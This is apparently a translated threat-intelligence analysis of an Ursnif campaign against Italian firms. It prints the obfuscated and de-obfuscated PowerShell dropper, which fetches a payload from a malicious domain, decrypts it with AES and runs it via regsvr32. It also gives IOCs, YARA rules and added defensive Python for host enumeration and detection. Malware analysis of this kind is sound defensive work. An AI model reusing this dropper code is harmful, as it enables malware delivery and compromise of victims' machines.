New Ursnif attacks against Italian companies

2020-05-25 16:07:56

Introduction

Ursnif is one of the most active threats in the landscape and typically runs spam campaigns against organizations in Italy and across several European sectors.

Recently, a new Ursnif variant targeting Italian companies was identified. The spam e-mails carry an attachment named Avviso di Pagamento_xxxx_date (where xxxx is a number and date is written as dd_mm_yyyy), for example Avviso di Pagamento_14326_15_04_2020. The techniques used by the Ursnif/ISFB dropper in this wave changed substantially: new tricks were adopted to evade detection, and the Ursnif infection chain received a major overhaul.

Technical analysis

Compared with other samples of the Ursnif family, the sample used against Italian companies contains several important upgrades, and the attack chain has changed noticeably. First, the dropper uses Excel 4.0 macros (XLM macros) to lower detection rates by antivirus engines; second, it talks to two different C&C servers, one of which is used only to record the UUIDs of compromised hosts.

The figure below shows the complete infection chain of this Ursnif campaign.

The legacy macro code

This new Ursnif campaign begins with a malicious e-mail attachment embedding XLM macros. The dropper's static information is as follows:

Hash: 5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394
Threat: Ursnif XLS document dropper
Size: 39.0 KB (39936 bytes)
File type: MS Excel document
Brief description: Ursnif XLS document dropper with embedded XLM macro code
ssdeep: Deb3eTlYkEIbSkKBEqEXPgsRZmbaoFhZhR0cixIHm0LzX74bTPuQ:DeaTlYkEIbSkKBEqEXPgsRZmbaoFhZhq

When opened, the file looks like an unfilled document. The sheet shows a Visualiz button that lures the victim into clicking it and triggering the infection. Clicking the button starts the code designed to infect the target machine:

The file is structurally similar to past malicious samples, but its content differs considerably. The security warning shows that the document contains dynamic content, and closer inspection reveals embedded Excel 4.0 macros (XLM macros).

The dynamic content is PowerShell code split across multiple cells and then evaluated by a few pre-positioned handlers:

When the user clicks Allow Content, the Frame1_Layout function is triggered. It reassembles the malicious macro code and makes the document pop up a window telling the user that the document is corrupted. When the user clicks it, the macro code terminates the Excel process, while PowerShell keeps running in the background.

After reassembly, the extracted macro code is the Ursnif dropper:

```powershell
sal uu New-Object; &( ([stRING]$VErBoSePRefErENce)[1,3]+'X'-JoIN'') ( uu io.compRESSiON.defLaTEstrEaM([system.Io.meMoRysTrEaM] [conVerT]::FROMbASE64StriNG( 'ZVULU9pKFP4rOxmum60QSXhpGWYualooPlrB1tbL3ERZJSUmSJYqTfe/3 8syGPuDNkX5/GdN2OFeFKv3vktxm7VYiqHtpVXdN7Q aHOPZ1Xde66 HRe13kNh7LO8TvSFit9YPwqUh1e5JePs/Zn7NdXEdY vsHCOcHWzrCMvztE9L0/wOo/OZl/j8M5vk777PES 9ViqrhgrMnYHg**pMMqPTAulZEnmNtvMBsYB4vPbxhdA7C8QiIvTi5H3YuPpFveYFUOsS6ygX/uQICA8MJRf L9YC2S4g/XipjR9Oi/gmHGRbOQd3tBehZc9nWr3PwwT 5VlCZsEIzt276aRcnjkBXyzkIXC/nHYKxb1vlpzRI53nBxbD6fQyHElw3IqnFchdCSKuOeRabkkzOQr8ohiXiRMyzxCEuC7/F4HgEJQ3h69eqx//49xHl6BzChlSE56IQLp5v8SifSBqKOFo51f3k Da4H/rgd9DsWPGczZ4nI00vnwb cvOWTclX6RdGadcPjMwoEuZsJ52s7voZuaz4IPhxazpvHyBJwS3W8IPUkRWbbGDrBdy3EH7jiLy7y269pNBoW8nHQ0c6bW0hAezol1mS0zfvvFg25a5D2SQm5fUNmvXqWEBqh6nR26RkxUPh3GUD78BbIjrJvs3Uc/cDXIh lCN 1bpV plFi20cNx3E9T/zZ27WZMrJ0FSajdGX3E7xVOknniWKVtb3343A2JEu00C/jKJa2vWdzNebCJiUCLEmq4mgiGX/H9wu5DKQWzZlU81nCiIQsew1Odet/YSdfhKPsJXrAYT6NU5Ow4 C3bvEwyzguX3TLwzaK8DR94RvDBxn0dz9pStVBEPV0y1yb0QPeVdDtaVZ6CtX9mHlEcjMigg5Ek7SAxHE6Hgdd3aJi6nk/TGJu1es0Du/lso42IYXoiS7yf5DdS7MEqdxb2lZdmYesXCU2wEJCmlAhDMzJJJgqnVBZQX9Xw2enQLH2vctKz/NIKoJ9Z4Du87HCoqZ8fwshP4Co7P0BF/uGEOsI0vC8T3ZFepXj3hu9ySL0kfkdMaptq551kZGzhZZxJkkx YXe9SaUJJN8JnXrb3s79xP54kIkWlORI4TrGE2C**g6 wwbvDAGeGQOLBH2bpK/A29duqgcIfZ3Oxn1vTCKYaLtbHg3MSJL3h3VHoj1DSgIVWbS82yqTV3dBM ml6m efb1bXkolpnyGnxBosjnpfWUKHhoAWcv4YZ3sdMF1 VD1XxHU FCKucbZUkcyUSZBF5ox rIoD2SV9mm0ZCjRtQT2xvHr/uqt7L3OjPts9SmvmnkFZmxuL5UjASreGakHeG0HGZe2Qw0z1u357KZeC6oPFw9kHruavZR6waxu ziNAFdGo5EDjIXMjwiAatbXfeJ9Dclcb3aZK/1qmBodbH8Ri8elkPHLXsMhwYFq1JnNrZIHdSwlc2FBua3CH3mhbIvpGL/SB5r4KPp6R5WaLLO0id50Cg7ZadSq6yGKpVMaGYKvci7Hla2ujnQ5Y8eJZVBHIe0nZ8V6d9JKtiJEUyQDBJqUNiIP2MXA ZCT5MBFR5qjkkfEzj4urqq4FVcELb0JTEVY4CYGorTkEJ5ul1DN8 axgRbD1bOHetKngdp8FVa4rZaK7pe0WsMS5/Ql1Eo/wE=' ),[iO.ComPrESsIOn.CoMPreSSioNmodE]::DEcOmPreSS )| fOReACH-ObjECT{ uu iO.StReamrEadeR( $_ ,[teXT.EnCODing]::AsCIi ) } |FoReACh-OBjecT{$_.READTOEnD() } )
```

After de-obfuscation, the code simplifies to the following:

```powershell
$lk64bE= [type]("{3}{7}{8}{2}{4}{11}{1}{6}{5}{10}{0}{9}" -F 'RitH','OgrAP','URi','S','Ty.C','As','hY.H','YST','Em.sEc','M','HALgO','Rypt') ; &("{1}{0}"-f 'et','S') 1S7 ( [TyPe]("{3}{1}{2}{0}" -F 'eNCOdING','TeX','t.','SysTEM.') ) ; $9Sk2Z =[TyPE]("{1}{0}" -f 'egEx','r');${IK`oL`OS}=0;Function T`h([String] ${Hy},${G`h}="MD5"){${Hh}=.('uu') ("{0}{1}{4}{5}{3}{2}" -f'S','ystem.Text.Stri','er','ld','n','gBui'); $lK64BE::("{2}{1}{0}" -f 'e','reat','C').Invoke(${GH})."cOMp`UTEhA`SH"( ( .("{0}{2}{3}{1}"-f'G','E','et-v','ArIaBL') 1S7 ).VAlUE::"uT`F8".("{1}{0}{2}"-f'etByt','G','es').Invoke(${H`Y}))|.('%'){[Void]${h`H}.("{0}{1}"-f'App','end').Invoke(${_}.("{0}{1}" -f'ToSt','ring').Invoke("x2"))};${HH}.("{0}{1}" -f 'ToS','tring').Invoke()};function Ht([string] ${E`E}){do{${U}=-join((97..122)|&("{1}{0}{2}"-f 'et-Rando','G','m') -Count 3|.('%'){[char]${_}})}while((&('th')(${U})) -notlike '*'+${e`e});return ${U}};${x`D}=("{2}{1}{0}" -f 't','adswif','uplo');${h`z}='ass';${Q}=2;${di}='pw';function Ts(${IJ}){${T`iK}=${IJ};if(${t`IK} -match 2){${Xd}=${H`z};${d`i}=''};${B`I}= $9SK2Z::("{1}{0}"-f 'eplace','r').Invoke(${t`Ik},'d',${x`D});if(&("{2}{4}{1}{0}{3}" -f 'ecti','onn','T','on','est-C') (${BI}+${D`I}) -Count 1 -quiet){${bi}=''+'ht'+'tp'+("{1}{0}"-f'/','s:/')+${bi}+${dI}+'/'+${B`i}.("{1}{2}{0}"-f'ring','Sub','st').Invoke(${q}, ${Q})}else{${b`I}=${q}};return ${B`i}};${e}=@(("{0}{1}"-f'new1','.'),'');function k`N{${LP}='2al'+(&('ht')(("{0}{1}" -f '*','6e1d')))+("{1}{0}" -f '.','ail')+(.('ht')(("{1}{0}"-f 'b','*95f')));return .('ts')(${Lp})};${X`q}=.('tS')(${E}[0]);if(${x`Q} -eq ${Q}){${X`Q}=&('Kn')};${y}=.('uu') ("{1}{0}{2}" -f'bC','Net.We','lient');${y}."He`AdeRs".("{1}{0}"-f'dd','A').Invoke(("{0}{1}{2}" -f 'Us','er-A','gent'), (("{16}{0}{24}{32}{7}{9}{31}{1}{20}{6}{22}{4}{5}{30}{8}{17}{25}{29}{21}{11}{13}{26}{15}{3}{10}{18}{28}{19}{12}{23}{27}{14}{2}"-f 'ozi','64; x64) AppleW','62','8.102 ','7.','36 (','it/5','0 (','H','Window','Saf','Ge','7','c','183','hrome/70.0.353','M','T','ari','3','ebK',' ','3','.36 Edge/','lla/','ML, ','ko) C','18.','/5','like','K','s NT 10.0; Win','5.')));${y}.("{4}{0}{3}{1}{2}"-f'own','stri','ng','load','D').Invoke(${Xq})|.( ([String]''."ReM`o`Ve")[45,12,27]-Join'')
```

The dropper relies on base64 encoding, string substitution (the many {} format placeholders) and randomized letter casing. Once the macro runs, the dropper contacts the newuploadswift[.]pw domain, downloads the next-stage payload and executes it with PowerShell. If that host does not answer the connectivity test, the kN function builds a fallback host name from a fixed prefix and two three-letter tokens chosen so that their MD5 digest ends with a hard-coded value.
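The fallback host generation in the de-obfuscated code above (functions Ht, kN and Ts) can be enumerated offline instead of sampled. The Python below is an added example, not code from Yoroi's write-up or from the sample: it re-implements the three-letter MD5-suffix search and the URL construction as I read them from the listing (suffixes 6e1d and 95fb, prefix 2al, middle ail., 'd' replaced by 'ass' for fallback names containing '2' and by 'uploadswift' otherwise, 'pw' appended to the primary name, path taken from Substring(2, 2)). The primary name newd. used in the test is an assumption that reconciles the listing's new1. with the IOC newuploadswift[.]pw.

```python
"""Enumerate the fallback hosts the dropper's Ht/kN/Ts functions can produce.

Added example, not Yoroi's code and not the sample's own source. `Ht` draws three
distinct lowercase letters (Get-Random -Count 3 over 97..122) until the MD5 hex
digest ends with a fixed suffix; `kN` glues two such tokens into
'2al' + token + 'ail.' + token; `Ts` rewrites the name and builds
https://<host>/<host[2:4]>. Exhausting the 26*25*24 = 15600 possible tokens
instead of sampling them yields the complete set of hosts to block.
"""
import hashlib
import string
from itertools import permutations


def md5_hex(text: str) -> str:
    """Equivalent of the dropper's `Th` helper: lowercase MD5 hex over UTF-8 bytes."""
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def candidates(suffix: str, length: int = 3) -> list[str]:
    """Every ordered pick of `length` distinct lowercase letters whose MD5 ends in `suffix`.

    Distinct letters because Get-Random -Count samples without replacement. An empty
    result means the do/while loop in `Ht` would never terminate for that suffix.
    """
    suffix = suffix.lower()
    return sorted(
        "".join(p)
        for p in permutations(string.ascii_lowercase, length)
        if md5_hex("".join(p)).endswith(suffix)
    )


def ts(name: str) -> str:
    """Mirror of `Ts`: turn a host name into the URL the dropper would request."""
    if "2" in name:                        # fallback names produced by kN
        host = name.replace("d", "ass")
    else:                                  # primary name: 'd' placeholder + 'pw' TLD
        host = name.replace("d", "uploadswift") + "pw"
    return f"https://{host}/{host[2:4]}"   # path = Substring(2, 2) of the host


def fallback_urls(prefix: str = "2al", suffix1: str = "6e1d",
                  middle: str = "ail.", suffix2: str = "95fb") -> list[str]:
    """All URLs `kN` can generate for the suffixes hard-coded in this sample."""
    return sorted({
        ts(f"{prefix}{a}{middle}{b}")
        for a in candidates(suffix1)
        for b in candidates(suffix2)
    })


if __name__ == "__main__":
    urls = fallback_urls()
    print(f"{len(urls)} fallback URL(s) reachable by this sample")
    for url in urls:
        print(url)
```

Because the token space is only 15600 strings, a four-hex-digit suffix is expected to match about 0.24 of them: an empty candidate list for either suffix means the sample hangs in `Ht` when the primary host is down, which is worth knowing before sandboxing it.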

```
'fVcJb9pIFP4rUytb2wpYJD0UBaFdwpFlS6CtIVGXRjvGDODgg9gDCaXz3/d7tgOGRo0UH N3fu9kugpd6UUhs5tT70kYJ9sBHyhzS/d5V9VGsZiJ5/vLS0PbnqttRW3PlFaeMl0sfb2kO67ANdZNqxOuowXxS6lK vcJjnWzGgu5ikOGUz73lapOX9R9e2qlukSqy MdqGpE4VrEMlMGTe8UqXyfqmTlqd6GTBl74Qx38fE9KY6CKyfBg31gAW pguqOB8VvIfKM7IfxOlmeOLrJblcsFE/laPwgXFk92fq8W1e1E NtZsB5akPqsD4Tsgy2jBQPTwEuHmTceeG78/8aUbBcSRHbm0SK4HMcTVauZGU3Pw6dQDCL/WR7yZlYW/iQR5Jzuf0xZJZbz0snnEDMEoBs2HDYaZqwz H/PsK bat3yy9liwefFU6n/GqqanB8omq5/ByxmZsbSaw/HtXPHQywIA0jxYlci52QvAt007S00OFBCwJiBBkRZpq1/aBONKi64Z gqQgmg/ySfu2S1UtHzplhwJI6//FFWUVfGZHKiIKWRTCR 5iZ MvByTAv5Fm5P36ggKfo3OF/LpBvbAuf/lOWtrS9hLv9Hh/UvVDEGlM/rUzM3kI/Y6ZUTcA6Xfl GpCUsgCHHk7IwGvg8dXBQ0BOudEqlOwMsLRXfjfkdX4jtFP9u36aIt9Wp7ql7xO753W7aWZv mlqL/iDqlmGfruCsE7fuhFBFG9sGQsnMEqUrEQIaAMeANoCZUbzVTgTEQPy3TmlWiySBNqs6x/eMpdFqv5RpdERReH5JpoIFJc24a1GH7kTt xEA/I5Cuc7vELKClI8oJxoFeK0r6obfpOXVWUfXypFx4eZQfLI0DmSdfzuHL7ZfKhq ipB5FlWIdXii2ULdxV7cmM14s1SRrPYWc43hyQD8Syry9XY91zm k6SsPp0m78n0pG4jTdSjO5ZEPlG/rhYlPCREo75D Y2P33wFqxGhc Gg/ZFK3SjCSgM00Lgr0CSGCCu1gVUtOxOsPRFIEJSgfDWGM5hpnCkMDR810B5TGV9EhtQQs8r3ygK NjwlkhkerFajatqJ/N8gDpMplEcsOP32q/G5GY0hZvSxvvwHDFbu6e2Fzr lR 5**OwqZQAkdUV4UzOzap6FU4X2ZdjeARnrozwzlu31c46MrqzndJBi1ki4mPhuZgpUHw9Vrnw16OUCyfNxAb63yn4rfW/VUC 7xUovWrt8h3doo5sn0zKg81SUKOge1NMvdBLM Vkm6wKAy9KPHSDG rez/yLQvN4ROf4k7pIl6YOROv2GnIuwBlQZen2LV5lpcteaYseNbOQulpP0NW6E MGKi8VQx3/1ok9Z yLyyu2ax7GUbl2aKCKoEj9HfrQ6ta83h0KzdxZ1WTFBYBmizNpUo UdGlGT6Ef6WY6jJo2 pgxysJ6T8qvScIVK986/kqg3dBZ1y6qbULnrcO7w5aGp06P3/YXQksJrztFwgsyrt7lZJy5y/e3hbAwvUcTqdvVTfTENp8kyizEYSH8NQLRzmdlNiTYyxyLkswJfB3Vp9kmslsbCPKpLG4akFKircGvK twQdJX4zTXaLxmY eFq1I6 2iSkiHlQrupDtpvNiZfRuQKl/EhL3EK3k55 Y45b9yYLeujhSxn6fM sRAnKydL35P6Gx3n6xieUm 1XgqAJsRQ8vaFVkXHEI47h6N9xTxK6aivRpV7mmsRHw5U7S8jE05bExzalUc TwdRY 7E9TimuYD/TXGUQMYvMXhqgepbGjmaijAAT9gNK1Uo92C6Lxl9sjSXR8NwoNF5R52e5iZJxU5rbORC670xomZ T QjYr5n5fFzFO9O63TcUX8QI KnNfpD3hto96aipcq2X/CyNOxBCDF3KSOJOgXhVHujmYj mn8FyazFB/Yg5h7vXWtkPcFjFuYl5BWycDZOV4NOEQBaTNdwf4FuUh15kTX1fLFbhncb4x0GpUgLl6Zt3fevNsWUDLChlQzrENYU1acU1gWhWFjszisVrHZUS97UONrsXC9NX1ofg4VC5WFS8Gv5t5bG4cPZubkVz54srgEwMCC7HqkjJsT4SRW6JjWOxCfzxRIUZx owST Lw7v1jdiwF5HIn2/SxsguV8/9HgBjw9wTH/LZD8LjHyrh4dpU51hv/4f'),
```

After de-obfuscation, the PowerShell becomes the following:

```powershell
function SDfiwe(${T`T}){${T`hL}=[regex]::("{2}{0}{1}"-f 'epl','ace','r').Invoke(${tt},'d','');return ${t`hl}};function YwE(${T`e}){${i`I}=[Convert]::("{0}{3}{2}{4}{1}" -f'F','tring','e64','romBas','S').Invoke(${t`E});return ${Ii}};&("{1}{0}"-f'l','sa') Vu new-object;${l`LA}=$(&("{0}{2}{3}{1}"-f'get-','object','wm','i') Win32_ComputerSystemProduct -computername . | &("{0}{2}{1}"-f'Select-','ject','Ob') -ExpandProperty UUID);${a`Zq}=${ENV`:tE`mP};${f`Bf}=(${d}=&("{0}{1}" -f'gc','i') ${a`zq}|&("{1}{0}{2}"-f 'd','get-ran','om'))."na`mE" -replace ".{5}$";${M`K}=(&("{1}{0}"-f 'i','Gc') -path (((${A`zQ}.("{0}{2}{1}" -f 'to','ring','st').Invoke()))) | &("{2}{3}{0}{1}"-f 'e-Obj','ect','W','her') { ${_}."pSis`cON`TAiner" }|.("{2}{1}{0}"-f 'lect','e','s') fullname |.("{1}{0}{2}"-f'ndo','Get-Ra','m') -count 1)."FulLn`A`Me"+''+${f`BF}+'.';function NiLL(${T`yO}){${k`j}=.('Vu') IO.MemoryStream(,${t`yO});${m`m}=(.('Vu') IO.StreamReader(&('Vu') IO.Compression.GzipStream(${k`J},[IO.Compression.CompressionMode]::"d`ECO`mPrESs"))).("{1}{2}{0}"-f 'nd','ReadT','oE').Invoke();return ${M`M}};&("{0}{1}" -f 's','al') msq regsv***;${S`U}='using System;using System.Security.Cryptography;using System.Text;public class Af{public static byte[] mol(byte[] kk, string lj){byte[] jik = new UTF8Encoding().GetBytes(lj);Aes AESImplementation = Aes.Create("AES");AESImplementation.Key = jik;AESImplementation.Mode = CipherMode.ECB;ICryptoTransform CryptoTransform = AESImplementation.CreateDecryptor();return CryptoTransform.TransformFinalBlock(kk, 0, kk.Length);}public static byte[] cer(string kk, string lj){return mol(Convert.FromBase64String(kk), lj);}public static string fte(byte[] kk, string lj){return new UTF8Encoding().GetString(mol(kk, lj));}public static string fte(string kk, string lj){return new UTF8Encoding().GetString(cer(kk, lj));}}';.("{0}{1}"-f'A','dd-Type') -TypeDefinition ${su};function osi{${M}=${x`Q}+${q}+'?'+${L`LA};.('Sv') 8 ${m};&('SV') t0L ("{2}{3}{0}{1}"-f 'ie','nt','Net','.WebCl');.('Si') Variable:B (&('Vu') (&("{0}{1}" -f 'I','tem') Variable:t0L)."v`ALUe");.('Sv') D ("{2}{0}{1}" -f'adDa','ta','Downlo');${f`DS}=(([byte[]](&('Gv') B -Value).((&('LS') Variable:D)."Va`LUE")."IN`VOke"((&('GI') Variable:8)."vAL`Ue")));return &("{0}{1}"-f 'Ni','LL')(${F`ds})};function kelv{${Fd}=&("{1}{0}" -f 'i','os');${fd}=[Af]::("{1}{0}"-f'e','ft').Invoke(${Fd},${l`lA}.("{2}{0}{1}"-f'ubstrin','g','s').Invoke(0,16));${U}=${FD}.("{1}{2}{0}" -f 'tring','su','bs').Invoke(0,1);${e`F}=${F`D}.("{1}{0}"-f 'emove','r').Invoke(0,1);${O`O}=${e`F} -split'!';${vr}=[Text.Encoding]::"Ut`F8";foreach(${O} in ${oO}[0]){${o`UT}=@();${O`A}=${U}.("{0}{1}{2}"-f'ToCharArr','a','y').Invoke();${o}=&("{1}{0}" -f 'wE','Y')(${O});for(${I}=0; ${i} -lt ${O}."c`oUnT"; ${I}++){${o`Ut}+= [char]([Byte]${O}[${i}] -bxor[Byte]${OA}[${I}%${o`A}."COU`NT"])}};${SS}=${e`F}."rep`lA`ce"((${o`O}[0]+"!"),${v`R}."gE`TSTr`i`NG"(${O`UT}));return ${SS}};function gb{${k`I}=&("{1}{0}"-f'lv','ke');[io.file]::("{0}{2}{1}"-f'Write','tes','AllBy').Invoke(${m`K},(.("{1}{0}" -f 'E','Yw')(${ki} -replace ".{200}$")));if((&("{1}{0}"-f 'ci','g') ${mk})."Len`GtH" -lt 512){exit};&("{0}{1}"-f'ms','q') -s ${mK};.("{0}{1}" -f'sle','ep') 15;.('sl');[io.file]::("{2}{1}{0}" -f'ines','llL','WriteA').Invoke(${m`k},(&("{1}{0}"-f'Dfiwe','S')(${l`LA})))};&('gb')
```

Here the malware uses a particular trick to guarantee a single infection per host. In the code above, the machine's UUID (read from Win32_ComputerSystemProduct) is collected and sent as a parameter of the GET request. If a GET request with the same UUID is sent a second time, the server returns an empty response; when a UUID is seen for the first time, the server returns the next stage of the infection.

As shown above, the response body is encrypted. It is decrypted with the AES routine embedded in the code above (AES in ECB mode, keyed with the first 16 characters of the UUID), written to a randomly named file under the user's %TEMP% folder, and then executed silently through the regsvr32.exe process.
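Seen as a process tree, the chain in the paragraphs above has two observable edges: Excel launching PowerShell from the XLM macro (Excel is killed, PowerShell survives), and PowerShell registering the decrypted DLL with regsvr32 -s from a file under %TEMP%. The Python below is an added example, not Yoroi's code or the sample's: it applies those two detection predicates to constructed Sysmon-style process-creation events. The telemetry, PIDs and paths are made up for the demonstration; the regsvr32 argument follows the loader's choice of a random %TEMP% subfolder and a file name ending in a dot, as read from the de-obfuscated code.

```python
"""Process-tree detections for the Ursnif XLM dropper chain.

Added example (not Yoroi's code, not the malware). Field names follow Sysmon
Event ID 1 (Image, ParentImage, CommandLine); the sample events are constructed,
not captured telemetry.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str
    parent_image: str
    command_line: str


OFFICE_HOSTS = {"excel.exe"}  # only Excel appears in this campaign; extend for other Office hosts
SILENT_FLAG = re.compile(r"(?:^|\s)[-/]s(?:\s|$)", re.IGNORECASE)   # regsvr32 -s / /s
USER_TEMP = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)  # %TEMP% of a user profile


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def office_spawned_powershell(ev: ProcEvent) -> bool:
    """XLM macro -> PowerShell: an Office host is the parent of powershell.exe."""
    return _basename(ev.parent_image) in OFFICE_HOSTS and _basename(ev.image) == "powershell.exe"


def regsvr32_silent_from_temp(ev: ProcEvent) -> bool:
    """regsvr32 run silently on a module that lives under the user's %TEMP% folder."""
    return (
        _basename(ev.image) == "regsvr32.exe"
        and bool(SILENT_FLAG.search(ev.command_line))
        and bool(USER_TEMP.search(ev.command_line))
    )


RULES = {
    "office_spawned_powershell": office_spawned_powershell,
    "regsvr32_silent_from_temp": regsvr32_silent_from_temp,
}


def detect(events):
    """Return (rule_name, pid, parent_basename) for every event that matches a rule."""
    hits = []
    for ev in events:
        for name, rule in RULES.items():
            if rule(ev):
                hits.append((name, ev.pid, _basename(ev.parent_image)))
    return hits


# Constructed sample telemetry modelled on the chain in the analysis (not captured data).
SAMPLE_EVENTS = [
    ProcEvent(4012, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"C:\Windows\explorer.exe",
              r'"EXCEL.EXE" "C:\Users\mario\Downloads\Avviso di Pagamento_14326_15_04_2020.xls"'),
    ProcEvent(4100, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
              r"powershell saps PowerShell -arg 'sal uu New-Object; ...' -Win 01;clear;exit"),
    ProcEvent(4188, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"PowerShell -arg sal uu New-Object; ... -Win 01"),
    ProcEvent(4250, r"C:\Windows\System32\regsvr32.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r'regsvr32 -s "C:\Users\mario\AppData\Local\Temp\msohtmlclip1\tmpA0B1."'),
    # Benign noise that must not fire: an installer registering a system DLL, a user shell.
    ProcEvent(900, r"C:\Windows\System32\regsvr32.exe", r"C:\Windows\System32\msiexec.exe",
              r"regsvr32 /s C:\Windows\System32\vbscript.dll"),
    ProcEvent(901, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"C:\Windows\explorer.exe", r"powershell -NoProfile"),
]

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

The second rule deliberately keys on the file location rather than the parent: the PowerShell parent is recorded in the hit for triage, but regsvr32 loading anything from a user's Temp directory is rare enough in most environments to stand on its own.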

Loader

The payload is as follows:

Hash: e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0
Threat: Ursnif loader
Size: 289.50 KB (296448 bytes)
File type: DLL
Brief description: Ursnif loader capable of injecting into memory
ssdeep: 6144:ydLG0cc HXn8zAzaFVqG9aldc3w0QBA8Ys36cMsu a:y5GjsEzaKG4XcLs3isu a
imphash: f11ff0b8c499af0d98f00299b97339cf

This component is the loader of the Ursnif payload. As a persistence mechanism it writes to the registry key HKCU\Software\AppDataLow\Software\Microsoft\Microsoft[RANDOMID].

As in classic Ursnif infections, this sample sends its configuration string to the C&C server base64-encoded and encrypted with the Serpent algorithm. There are two ways to retrieve the configuration string:

1. Decrypt the request sent to the C&C server with the key extracted from process memory.
2. Look for the configuration string directly in the process's memory.

The configuration used in this Ursnif campaign is as follows:

```
k=kjrisau&soft=1&version=214131&user=92bdf642cd2b24f71ccbae351ccb9aa9&server=12&id=4444&crc=ef267149&uptime=12089&ip=*.*.*.*
```

Conclusion

Continuous tracking shows that Ursnif's TTPs change over time and that the malware's detection-evasion and anti-analysis techniques are evolving rapidly.

This attack against Italian companies keeps the malware's core characteristics and functionality unchanged while using XLM macros to lower antivirus detection rates and two different C&C servers. One of them only accepts UUIDs and tracks compromised hosts, a mechanism that lets the operators monitor the spread of the infection more precisely.

IOC

5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394
e32c592819d825851bae84a33bf5fa1a26e0a57a14c0e4b8c3e845c1117998a0
newuploadswift[.]pw
yefgweoiuhf[.]xyz
HKCU\Software\AppDataLow\Software\Microsoft\Microsoft[RANDOMID]

Yara

```yara
import "pe"

rule loaderXLS_Ursnif_Italy_April_2020 {
    meta:
        description = "Yara rule for Ursnif XLS loader - April Italian Campaign"
        hash = "5f9da8134eece8b25f6d4da2815d49cc1ea7a5e9d2b18cec549a1ee47010c394"
        author = "Cybaze - Yoroi ZLab"
        last_updated = "2020-04-16"
        tlp = "white"
        category = "informational"
    strings:
        $s1 = "powershellB"
        $s2 = {73 61 70 73 20 50 6F 77 65 72 53 68 65 6C 6C 20 2D 61 72 67 20 27 73 61 6C 20 75 75 20 4E 65 77 2D 4F 62 6A 65 63 74 3B 20 26 7B 28 7D 20 7B 28 7D 7B 5B 7D 73 74 52 49 4E 47 7B 5D 7D 24 56 45 72 42 6F 53 65 50 52 65 66 45 72 45 4E 63 65 7B 29 7D 7B 5B 7D 31 2C 33 7B 5D 7D 7B 2B 7D 27 27 58 27 27 2D 4A 6F 49 4E 27 27 27 27 7B 29 7D 20 7B 28 7D 20 75 75 20 69 6F 2E 63 6F 6D 70 52 45 53 53 69 4F 4E 2E 64 65 66 4C 61 54 45 73 74 72 45 61 4D 7B 28 7D 7B 5B 7D 73 79 73 74 65 6D 2E 49 6F 2E 6D 65 4D 6F 52 79 73 54 72 45 61 4D 7B 5D 7D 20 7B 5B 7D 63 6F 6E 56 65 72 54 7B 5D 7D 3A 3A 46 52 4F 4D 62 41 53 45 36 34 53 74 72 69 4E 47 7B 28 7D 20 27 27 5A 56 55 4C 55 39 70 4B 46 50 34 72 4F 78 6D 75 6D 36 30 51 53 58 68 70 47 57 59 75 61 6C 6F 6F 50 6C 72 42 31 74 62}
        $s3 = {FF 09 01 17 FC 00 4C 33 45 52 5A 4A 53 55 6D 53 4A 59 71 54 66 65 2F 33 7B 2B 7D 38 73 79 47 50 75 44 4E 6B 58 35 2F 47 64 4E 32 4F 46 65 46 4B 76 33 76 6B 74 78 6D 37 56 59 69 71 48 74 70 56 58 64 4E 37 51 7B 2B 7D 61 48 4F 50 5A 31 58 64 65 36 36 7B 2B 7D 48 52 65 31 33 6B 4E 68 37 4C 4F 38 54 76 53 46 69 74 39 59 50 77 71 55 68 31 65 35 4A 65 50 73 2F 5A 6E 37 4E 64 58 45 64 59 7B 2B 7D 76 73 48 43 4F 63 48 57 7A 72 43 4D 76 7A 74 45 39 4C 30 2F 77 4F 6F 2F 4F 5A 6C 2F 6A 38 4D 35 76 6B 37 37 37 50 45 53 7B 2B 7D 39 56 69 71 72 68 67 72 4D 6E 59 48 67 43 34 70 4D 4D 71 50 54 41 75 6C 5A 45 6E 6D 4E 74 76 4D 42 73 59 42 34 76 50 62 78 68 64 41 37 43 38 51 69 49 76 54 69 35 48 33 59 75 50 70 46 76 65 59 46 55 4F 73 53 36 79 67 58 2F 75 51 49 43 41 38 4D 4A}
        $s4 = {2B 7D 4C 39 59 43 32 53 34 67 2F 58 69 70 6A 52 39 4F 69 2F 67 6D 48 47 52 62 4F 51 64 33 74 42 65 68 5A 63 39 6E 57 72 33 50 77 77 54 7B 2B 7D 35 56 6C 43 5A 73 45 49 7A 74 32 37 36 61 52 63 6E 6A 6B 42 58 79 7A 6B 49 58 43 2F 6E 48 59 4B 78 62 31 76 6C 70 7A 52 49 35 33 6E 42 78 62 44 36 66 51 79 48 45 6C 77 33 49 71 6E 46 63 68 64 43 53 4B 75 4F 65 52 61 62 6B 6B 7A 4F 51 72 38 6F 68 69 58 69 52 4D 79 7A 78 43 45 75 43 37 2F 46 34 48 67 45 4A 51 33 68 36 39 65 71 78 2F 2F 34 39 78 48 6C 36 42 7A 43 68 6C 53 45 35 36 49 51 4C 70 35 76 38 53 69 66 53 42 71 4B 4F 46 6F 35 31 66 33 6B 7B 2B 7D 44 61 34 48 2F 72 67 64 39 44 73 57 50 47 63 7A 5A 34 6E 49 30 30 76 6E 77 62 7B 2B 7D 63 76 4F 57 54 63 6C 58 36 52 64 47 61 64 63 50 6A 4D 77 6F 45 75 5A 73 4A}
